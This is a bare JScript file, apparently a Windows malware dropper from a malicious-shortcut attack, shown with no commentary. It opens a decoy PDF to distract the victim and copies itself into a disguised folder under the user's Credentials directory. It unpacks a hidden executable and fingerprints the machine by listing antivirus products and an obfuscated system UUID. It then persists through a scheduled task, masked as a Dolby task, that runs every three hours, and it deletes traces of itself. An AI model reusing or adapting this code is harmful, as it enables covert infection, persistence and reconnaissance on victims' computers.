(function() {//END2
    try {//END2
        var objFSO = new ActiveXObject("Scripting.FileSystemObject");//END2
        var objShell = new ActiveXObject("WScript.Shell");//END2
//END2
        var tmpPath = objShell.ExpandEnvironmentStrings("%TMP%");//END2
//END2
        var lnkPath = tmpPath + "\\1.lnk";//END2
//END2
        var appDataPath = objShell.ExpandEnvironmentStrings("%localappdata%");//END2
//END2
        var upperWorkDir = appDataPath + "\\Microsoft\\Credentials\\MediaPlayer";//END2
        var workDir = upperWorkDir + "\\VideoManager";//END2
        var workJSFile = "media.js";//END2
        var workJSPath = workDir + "\\" + workJSFile;//END2
//END2
//END2
        var en = b64dd("ZGRwcC5leGU=");//END2
        var ePath = upperWorkDir + "\\" + en;//END2
//END2
        var en2 = b64dd("bWFpbi5leGU=");//END2
        var ePath2 = upperWorkDir + "\\" + en2;//END2
//END2
        var tsPath = "%localappdata%\\Microsoft\\Credentials\\MediaPlayer\\" + en;//END2
//END2
        var isu = 0;//END2
//END2
        if (WScript.ScriptFullName == workJSPath) {//END2
            WScript.Sleep(30000);//END2
//END2
            try {//END2
                if (objFSO.FolderExists(workDir)) {//END2
                    objFSO.DeleteFolder(workDir, true);//END2
                }//END2
            } catch(e){}//END2
//END2
            WScript.Sleep(30000);//END2
            rde();//END2
            dlo();//END2
        } else {//END2
            rdp();//END2
            mpf();//END2
            objFSO.DeleteFile(WScript.ScriptFullName);//END2
            objShell.Run("cscript \"" + workJSPath + "\"", 0, 0);//END2
        }//END2
    } catch(err) {}//END2
//END2
    WScript.Quit();//END2
//END2
    function dlo() {//END2
        try {//END2
            var scriptFile = objFSO.GetFile(lnkPath);//END2
            scriptFile.attributes = 128;//END2
            objFSO.DeleteFile(lnkPath);//END2
        } catch(err){}//END2
    }//END2
//END2
    function rdp() {//END2
        try{//END2
            var d = br(lnkPath,2499,425487);//END2
            d = d.reverse();//END2
            bw("compliance-docpack.pdf", d, 425487);//END2
            objShell.Run("\"" + "compliance-docpack.pdf" + "\"", 1, 0);//END2
        } catch(err){}//END2
    }//END2
//END2
    function rde() {//END2
        try {//END2
            var d = br(lnkPath,427986,262144);//END2
            d = d.reverse();//END2
            bw(ePath2, d, 262144);//END2
            objFSO.CopyFile(ePath2, ePath);//END2
            objFSO.DeleteFile(ePath2);//END2
            cts();//END2
        } catch(err){}//END2
    }//END2
//END2
    function br(path,offset,size) {//END2
        var stream;//END2
        var binaryStream;//END2
//END2
        binaryStream = [];//END2
//END2
        stream = new ActiveXObject("ADODB.Stream");//END2
        stream.Type = 1;//END2
        stream.Open();//END2
        stream.LoadFromFile(path);//END2
        stream.Position = offset;//END2
//END2
        for (var i=0;i<size;i++) {//END2
            binaryStream.push(stream.Read(1));//END2
        }//END2
//END2
        stream.close();//END2
//END2
        return binaryStream;//END2
    }//END2
//END2
    function bw(path,binaryStream, size) {//END2
        var stream;//END2
//END2
        stream = new ActiveXObject("ADODB.Stream");//END2
        stream.Type = 1;//END2
        stream.Open();//END2
//END2
        for (var i=0;i<size;i++) {//END2
            stream.Write(binaryStream[i]);//END2
        }//END2
//END2
        stream.SaveToFile(path, 2);//END2
        stream.close();//END2
    }//END2
//END2
    function b64dd(data) {//END2
        var xmlObj = WScript.CreateObject("MSXml2.DOMDocument");//END2
        var docElement = xmlObj.createElement("Base64Data");//END2
//END2
        docElement.dataType = "bin.base64";//END2
//END2
        docElement.text = data;//END2
//END2
        var outputStream = WScript.CreateObject("ADODB.Stream");//END2
        outputStream.Type = 1;//END2
        outputStream.Open();//END2
        outputStream.Write(docElement.nodeTypedValue);//END2
        outputStream.Position = 0;//END2
        outputStream.type = 2;//END2
        outputStream.CharSet = "us-ascii";//END2
//END2
        var output = outputStream.ReadText;//END2
//END2
        outputStream.Close();//END2
//END2
        return output//END2
    }//END2
//END2
    function b64ed(data) {//END2
        var outputStream = WScript.CreateObject("ADODB.Stream");//END2
        outputStream.Type = 2;//END2
        outputStream.CharSet = "us-ascii";//END2
        outputStream.Open();//END2
        outputStream.WriteText(data);//END2
        outputStream.Position = 0;//END2
        outputStream.type = 1;//END2
//END2
        var output = outputStream.Read;//END2
//END2
        outputStream.Close();//END2
//END2
        var xmlObj = WScript.CreateObject("MSXml2.DOMDocument");//END2
        var docElement = xmlObj.createElement("Base64Data");//END2
        docElement.dataType = "bin.base64";//END2
        docElement.nodeTypedValue = output;//END2
//END2
        return docElement.text;//END2
    }//END2
//END2
    function mpf() {//END2
        try {//END2
            if (objFSO.FolderExists(workDir)) {//END2
                objFSO.DeleteFolder(workDir, true);//END2
            }//END2
        } catch(e){}//END2
//END2
        try {//END2
            if (!objFSO.FolderExists(upperWorkDir)) {//END2
                objFSO.CreateFolder(upperWorkDir);//END2
            }//END2
        } catch(e){}//END2
//END2
        try {//END2
            objFSO.CreateFolder(workDir);//END2
        } catch(e){}//END2
//END2
        var iss = false;//END2
        while(!iss) {//END2
            try{//END2
                objFSO.CopyFile(WScript.ScriptFullName, workJSPath);//END2
//END2
                iss = true;//END2
            } catch(err){}//END2
        }//END2
    }//END2
//END2
    function inc(arr, d) {//END2
        for (var i=0 ; i<arr.length ; ++i) {//END2
            if (arr[i] == d) {//END2
                return true;//END2
            }//END2
        }//END2
//END2
        return false;//END2
    }//END2
//END2
    function rs() {//END2
        var s = "";//END2
        var l = 6;//END2
        var d = "123456789";//END2
//END2
        for (var i=0 ; i<l ; ++i) {//END2
            s += d.charAt(Math.floor(d.length * Math.random()));//END2
        }//END2
//END2
        return s;//END2
    }//END2
//END2
    function encd(s) {//END2
        var es = "";//END2
        var k = rs();//END2
//END2
        for (var i=0 ; i<s.length ; ++i) {//END2
            var sc = s.charCodeAt(i);//END2
            var kc = k.charCodeAt(i % k.length);//END2
            var xc = String.fromCharCode(sc ^ kc);//END2
//END2
            es += xc;//END2
        }//END2
//END2
        return encodeURIComponent(b64ed(k+es));//END2
    }//END2
//END2
    function gav()//END2
    {//END2
        var avl = [];//END2
        var as = "";//END2
//END2
        try {//END2
            var wmi = GetObject("winmgmts:\\\\.\\root\\SecurityCenter");//END2
            var e = new Enumerator(wmi.InstancesOf("AntiVirusProduct"));//END2
//END2
            for(; !e.atEnd(); e.moveNext()) {//END2
                var s = e.item();//END2
//END2
                var n = s.displayName.toLowerCase();//END2
//END2
                avl.push(n);//END2
                as += n + "|";//END2
            }//END2
//END2
            wmi = GetObject("winmgmts:\\\\.\\root\\SecurityCenter2");//END2
            e = new Enumerator(wmi.InstancesOf("AntiVirusProduct"));//END2
//END2
            for(; !e.atEnd(); e.moveNext()) {//END2
                var s = e.item();//END2
//END2
                var n = s.displayName.toLowerCase();//END2
                if (inc(avl, n)) {//END2
                    continue;//END2
                }//END2
//END2
                avl.push(n);//END2
                as += n + "|";//END2
            }//END2
//END2
            as = as.substring(0, as.length-1);//END2
        } catch(err){}//END2
//END2
        return as;//END2
    }//END2
//END2
    function svuid() {//END2
        var wmi = GetObject("winmgmts:\\\\.\\root\\cimv2");//END2
//END2
        var items = wmi.ExecQuery("SELECT UUID FROM Win32_ComputerSystemProduct", "WQL", 0x30);//END2
//END2
        var eit = new Enumerator(items);//END2
//END2
        var suid = "";//END2
//END2
        for (; !eit.atEnd(); eit.moveNext()) {//END2
            var it = eit.item();//END2
            suid = it.UUID;//END2
            break;//END2
        }//END2
//END2
        if (!suid) {//END2
            return "";//END2
        }//END2
//END2
        var i=0;//END2
        var suidLen = suid.length;//END2
//END2
        var svcUid = "";//END2
//END2
        while ((i + 1) < suidLen) {//END2
            var s = (parseInt(suid.substring(i, i+2), 16) ^ 0x42).toString(16).toUpperCase();//END2
            if (s.length < 2) {//END2
                s = "0" + s;//END2
            }//END2
//END2
            svcUid += s;//END2
//END2
            i += 2;//END2
//END2
            if (i == suidLen) {//END2
                break;//END2
            }//END2
//END2
            if (suid.charAt(i) == "-") {//END2
                ++i;//END2
                svcUid += "-"//END2
            }//END2
        }//END2
//END2
        return encodeURIComponent(b64ed(svcUid));//END2
    }//END2
//END2
    function dts(d) {//END2
        var day = d.getDate().toString();//END2
        var year = d.getFullYear().toString();//END2
        var month = (d.getMonth() + 1).toString();//END2
//END2
        var hour = d.getHours().toString();//END2
        var mins = d.getMinutes().toString();//END2
        var secs = d.getSeconds().toString();//END2
//END2
        if (day.length < 2) {//END2
            day = "0" + day;//END2
        }//END2
//END2
        if (month.length < 2) {//END2
            month = "0" + month;//END2
        }//END2
//END2
        if (hour.length < 2) {//END2
            hour = "0" + hour;//END2
        }//END2
//END2
        if (mins.length < 2) {//END2
            mins = "0" + mins;//END2
        }//END2
//END2
        if (secs.length < 2) {//END2
            secs = "0" + secs;//END2
        }//END2
//END2
        return (year + "-" + month + "-" + day + "T" + hour + ":" + mins + ":" + secs);//END2
    }//END2
//END2
    function cts() {//END2
        try {//END2
            var ts = WScript.CreateObject("Schedule.Service");//END2
            ts.Connect();//END2
//END2
            var rf = ts.GetFolder("\\");//END2
            var tf = ts.NewTask(0);//END2
//END2
            var ri = tf.RegistrationInfo;//END2
            ri.Description = "";//END2
            ri.Author = "";//END2
//END2
            var tst = tf.Settings;//END2
            tst.Enabled = true;//END2
            tst.StartWhenAvailable = true;//END2
            tst.Hidden = false;//END2
//END2
            var cd = new Date();//END2
            var sd = new Date(cd.getTime()+(1000*60));//END2
//END2
            var tt = tf.Triggers;//END2
//END2
            var tr = tt.Create(1);//END2
            tr.StartBoundary = dts(sd);//END2
            tr.Enabled = true;//END2
            tr.Repetition.Interval = "PT3H";//END2
//END2
            var uid = svuid();//END2
//END2
            var u = "\"" + uid + "\" " + "\"" + encd(gav()) + "\" " + isu.toString();//END2
//END2
            var ta = tf.Actions.Create(0);//END2
            ta.Path = tsPath;//END2
            ta.Arguments = u;//END2
            ta.WorkingDirectory = upperWorkDir;//END2
//END2
            rf.RegisterTaskDefinition(b64dd("RG9sYnkgU2VsZWN0b3IgVGFzaw=="), tf, 6, "","", 3);//END2
//END2
            return true;//END2
        } catch(ex) {}//END2
//END2
        return false;//END2
    }//END2
})();//END2
//END2
